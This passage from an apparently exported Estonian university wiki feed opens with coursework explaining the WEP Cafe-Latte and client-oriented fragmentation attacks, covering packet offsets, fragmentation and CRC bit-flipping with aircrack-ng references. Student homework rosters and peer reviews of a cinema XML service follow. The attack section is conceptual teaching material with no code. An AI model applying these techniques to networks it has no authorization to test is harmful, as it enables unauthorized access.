Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
===ARP===&lt;br /&gt;
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
===IP===&lt;br /&gt;
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks &#039;&#039;bit flippingut&#039;&#039;. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC&#039;i muutmiseks juhul kui seal on algselt &#039;&#039;multicast&#039;&#039;.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
[[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=V%C3%B5rgurakendused_II:_2011_kevadel_valminud_kodut%C3%B6%C3%B6d&amp;diff=32562</id>
		<title>Võrgurakendused II: 2011 kevadel valminud kodutööd</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=V%C3%B5rgurakendused_II:_2011_kevadel_valminud_kodut%C3%B6%C3%B6d&amp;diff=32562"/>
		<updated>2011-05-23T06:04:06Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Tanel Liiv */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Jaan Igamees=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;FoodWars&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kert Suvi=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond Tool]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Helen Muidik=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;GAP&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Mihkel Sokk=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Tact&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Sepad&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Seda Sahradyan=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Tact&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Priit Siimo=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;GAP&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond Tool]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Siim Sarv=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;FoodWars&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;FoodWars&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Reigo Männiste=&lt;br /&gt;
* Meeskond [[Meeskond Tool]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Karl Männil=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Sepad&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;H2&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Ilmar Telga=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;FoodWars&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;GAP&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond Tool]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond &amp;quot;Hungry Student Food Board&amp;quot;]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Siim Aaver=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;H2&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Taavi Ilves=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Hungry_Student_Food_Board&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;ASP-tastic&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond_&amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Jaan Kruusma=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Hungry_Student_Food_Board&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Andrus Reedla=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;GAP&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Jaak Lehtsalu=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Tact&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond Tool]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Jana Mrots=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Tact&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Heiki Tamm=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;H2&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Meeskond&amp;quot;]]&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond  &amp;quot;Hungry Student Food Board&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Toomas Soha=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Sepad&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Miina Sikk=&lt;br /&gt;
* Meeskond [[Meeskond Tool]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Tact&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Rauno Rüga=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;FoodWars&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele [[Talk:Meeskond Tool]]&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Tanel Liiv=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Hungry Student Food Board&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele [[Talk:Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Gaspar Karm=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;GAP&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;FoodWars&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Joosep Ilves=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Taivo Türnpu=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;ASP-tastic&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond Tool]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Sander Baikov=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Sepad&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;ASP-tastic&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Allar Anijago=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Tool&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Madis Sarv=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Kaspar Kallasmaa=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Jarko Kaskmaa=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;ASP-tastic&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Indrek Kõue=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;ASP-tastic&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;GAP&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Erik Kaju=&lt;br /&gt;
* Meeskond [[Meeskond Tool]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Mailis Toompuu=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;H2&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;Sepad&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Madis Kõosaar=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Tyhik&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;C terav&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;br /&gt;
&lt;br /&gt;
=Gert Glükmann=&lt;br /&gt;
* Meeskond [[Meeskond &amp;quot;Nämm-nämm&amp;quot;]]&lt;br /&gt;
* Arvustused&lt;br /&gt;
** Arvustus XML failile [[Talk:Meeskond &amp;quot;ASP-tastic&amp;quot;]]&lt;br /&gt;
** Arvustus veebiteenusele&lt;br /&gt;
** Arvustus veebiteenuse klientidele&lt;br /&gt;
** Arvustus projektile kokkuvõtvalt&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Talk:Meeskond_%22Tyhik%22&amp;diff=32561</id>
		<title>Talk:Meeskond &quot;Tyhik&quot;</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Talk:Meeskond_%22Tyhik%22&amp;diff=32561"/>
		<updated>2011-05-23T06:01:59Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;
Arvustus&lt;br /&gt;
&lt;br /&gt;
Meeskonna Tyhik loodud kinokavade xml faili struktuur on nõuetekohane, kenasti stiilis &lt;br /&gt;
&amp;lt;kinod&amp;gt;&lt;br /&gt;
   &amp;lt;kino&amp;gt;&lt;br /&gt;
      ...&lt;br /&gt;
ning &lt;br /&gt;
&amp;lt;filmid&amp;gt;&lt;br /&gt;
   &amp;lt;film&amp;gt;&lt;br /&gt;
      ...&lt;br /&gt;
Stiili- ja abifailid on olemas ning kui ma neid läbi vaatasin, siis vigu ei tuvastanud.&lt;br /&gt;
Lehe esialgne kujundus on hea, mulle meeldib.&lt;br /&gt;
Kokkuvõttes: minu arvates hea raam, millele veebirakendus ümber ehitada.&lt;br /&gt;
&lt;br /&gt;
Indrek Tamm, meeskond Tool, 4.III.2011&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Võib öelda, et XML on väga põhjalik ja seal on kajastatud kõik andmed, mis kinokülastajale huvi võiksid pakkuda. Isiklikult ei leidnudki kohta, kus oleks tahtnud midagi teistmoodi teha. Sellise XML põhjal on kindlasti võimalik korralik teenus ja klientrakendus ehitada. Samuti on olemas skeemifail ja korralik XSLT, mis esitab andmeid vägagi loetaval ja ülevaatlikul kujul.&lt;br /&gt;
&lt;br /&gt;
Siim Aaver, D21&lt;br /&gt;
&lt;br /&gt;
Uurides XML, uurisin mis uurisin aga ei oska kohe midagi ette heita. XML fail tundub ilusti struktureeritud, ja paistab et on olemas ka kõik vajalikud asjad, mis kinosüsteemis peaksolemas olema. Kõik failid on korralikult loetaavad ja arusaamisega probleeme ei teki. Lihtne ülesehitus.&lt;br /&gt;
&lt;br /&gt;
Jaak Lehtsalu D22&lt;br /&gt;
&lt;br /&gt;
XML fail keskendub elementidele, struktuur on loogiline. Andmed hoitakse võimalikult detailselt, nii et midagi halba pole öelda. Skeemifailis on seatud elementidele vastavusse andmetüübid, mida neis hoitakse, korralik töö. Stiilifail mitte ainult ei loe lihtsalt XMLi elementide sisu vaid paneb need ka stiliseeritud tabelisse, mis parandab loetavust. Tore oleks tõesti sait, kust kerge kinodes toimuvast infot saada ning see on hea põhi sellise teenuse loomiseks.&lt;br /&gt;
&lt;br /&gt;
Reigo Männiste D22&lt;br /&gt;
&lt;br /&gt;
Väga põhjalik XML fail ning väga hästi ülesehitatud stiilifail. Kõik vajalik on olemas ning veel lisaks ka muudki.&lt;br /&gt;
&lt;br /&gt;
Nimetused oleks võinud teistmoodi üles ehitada. Seal on olemas originaal ning tõlgitud filmi nimi, kuid sinna võiks olla võimalik lisada ka muid keeli. Kuigi kui rakendus jääbki ainult eesti keelseks siis pole vahet.&lt;br /&gt;
&lt;br /&gt;
Jarko Kaskmaa D21&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Teenuse arvamus&lt;br /&gt;
&lt;br /&gt;
Erinevaid teenuseid tundub olevat piisavalt palju, et antud veebiteenusele&lt;br /&gt;
saaks ehitada ühe korraliku ja kasuliku rakenduse. &lt;br /&gt;
Natuke tekitavad kahtlused näitkes võta hind, kustuta hind - mille jaoks neid vaja on?&lt;br /&gt;
Kui see käib mingi seansi kohta, siis võiks see olla näiteks filmi objekti küljes&lt;br /&gt;
koos teiste filmi parameetritega. Kui liiga palju meetoteid on, pole ka alati hea.&lt;br /&gt;
Aga samas, see on minu arvamus. Edu!&lt;br /&gt;
&lt;br /&gt;
Taavi Ilves D21&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Teenuse arvustus&lt;br /&gt;
&lt;br /&gt;
Teenuseid on korralik hulk, kuid Eestikeelsed API nimed ei ole arusaadavad välismaalastele. Segadust tekitab veel &amp;quot;anna*&amp;quot; ja &amp;quot;võta*&amp;quot;, kas mina annan talle ja ta võtab, või võtab tema ja annab mulle - nimi peaks ütleme kohe mis suunas liiklus käib. Tundub et mõned päringud saaks kokku &#039;&#039;mergeda&#039;&#039;, näiteks annaFilmid ja annaFilmidNimi. Üldiselt aga on kena :)&lt;br /&gt;
&lt;br /&gt;
-Tanel Liiv D22&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Talk:Meeskond_%22Tyhik%22&amp;diff=32560</id>
		<title>Talk:Meeskond &quot;Tyhik&quot;</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Talk:Meeskond_%22Tyhik%22&amp;diff=32560"/>
		<updated>2011-05-23T06:01:43Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;
Arvustus&lt;br /&gt;
&lt;br /&gt;
Meeskonna Tyhik loodud kinokavade xml faili struktuur on nõuetekohane, kenasti stiilis &lt;br /&gt;
&amp;lt;kinod&amp;gt;&lt;br /&gt;
   &amp;lt;kino&amp;gt;&lt;br /&gt;
      ...&lt;br /&gt;
ning &lt;br /&gt;
&amp;lt;filmid&amp;gt;&lt;br /&gt;
   &amp;lt;film&amp;gt;&lt;br /&gt;
      ...&lt;br /&gt;
Stiili- ja abifailid on olemas ning kui ma neid läbi vaatasin, siis vigu ei tuvastanud.&lt;br /&gt;
Lehe esialgne kujundus on hea, mulle meeldib.&lt;br /&gt;
Kokkuvõttes: minu arvates hea raam, millele veebirakendus ümber ehitada.&lt;br /&gt;
&lt;br /&gt;
Indrek Tamm, meeskond Tool, 4.III.2011&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Võib öelda, et XML on väga põhjalik ja seal on kajastatud kõik andmed, mis kinokülastajale huvi võiksid pakkuda. Isiklikult ei leidnudki kohta, kus oleks tahtnud midagi teistmoodi teha. Sellise XML põhjal on kindlasti võimalik korralik teenus ja klientrakendus ehitada. Samuti on olemas skeemifail ja korralik XSLT, mis esitab andmeid vägagi loetaval ja ülevaatlikul kujul.&lt;br /&gt;
&lt;br /&gt;
Siim Aaver, D21&lt;br /&gt;
&lt;br /&gt;
Uurides XML, uurisin mis uurisin aga ei oska kohe midagi ette heita. XML fail tundub ilusti struktureeritud, ja paistab et on olemas ka kõik vajalikud asjad, mis kinosüsteemis peaksolemas olema. Kõik failid on korralikult loetaavad ja arusaamisega probleeme ei teki. Lihtne ülesehitus.&lt;br /&gt;
&lt;br /&gt;
Jaak Lehtsalu D22&lt;br /&gt;
&lt;br /&gt;
XML fail keskendub elementidele, struktuur on loogiline. Andmed hoitakse võimalikult detailselt, nii et midagi halba pole öelda. Skeemifailis on seatud elementidele vastavusse andmetüübid, mida neis hoitakse, korralik töö. Stiilifail mitte ainult ei loe lihtsalt XMLi elementide sisu vaid paneb need ka stiliseeritud tabelisse, mis parandab loetavust. Tore oleks tõesti sait, kust kerge kinodes toimuvast infot saada ning see on hea põhi sellise teenuse loomiseks.&lt;br /&gt;
&lt;br /&gt;
Reigo Männiste D22&lt;br /&gt;
&lt;br /&gt;
Väga põhjalik XML fail ning väga hästi ülesehitatud stiilifail. Kõik vajalik on olemas ning veel lisaks ka muudki.&lt;br /&gt;
&lt;br /&gt;
Nimetused oleks võinud teistmoodi üles ehitada. Seal on olemas originaal ning tõlgitud filmi nimi, kuid sinna võiks olla võimalik lisada ka muid keeli. Kuigi kui rakendus jääbki ainult eesti keelseks siis pole vahet.&lt;br /&gt;
&lt;br /&gt;
Jarko Kaskmaa D21&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Teenuse arvamus&lt;br /&gt;
&lt;br /&gt;
Erinevaid teenuseid tundub olevat piisavalt palju, et antud veebiteenusele&lt;br /&gt;
saaks ehitada ühe korraliku ja kasuliku rakenduse. &lt;br /&gt;
Natuke tekitavad kahtlused näitkes võta hind, kustuta hind - mille jaoks neid vaja on?&lt;br /&gt;
Kui see käib mingi seansi kohta, siis võiks see olla näiteks filmi objekti küljes&lt;br /&gt;
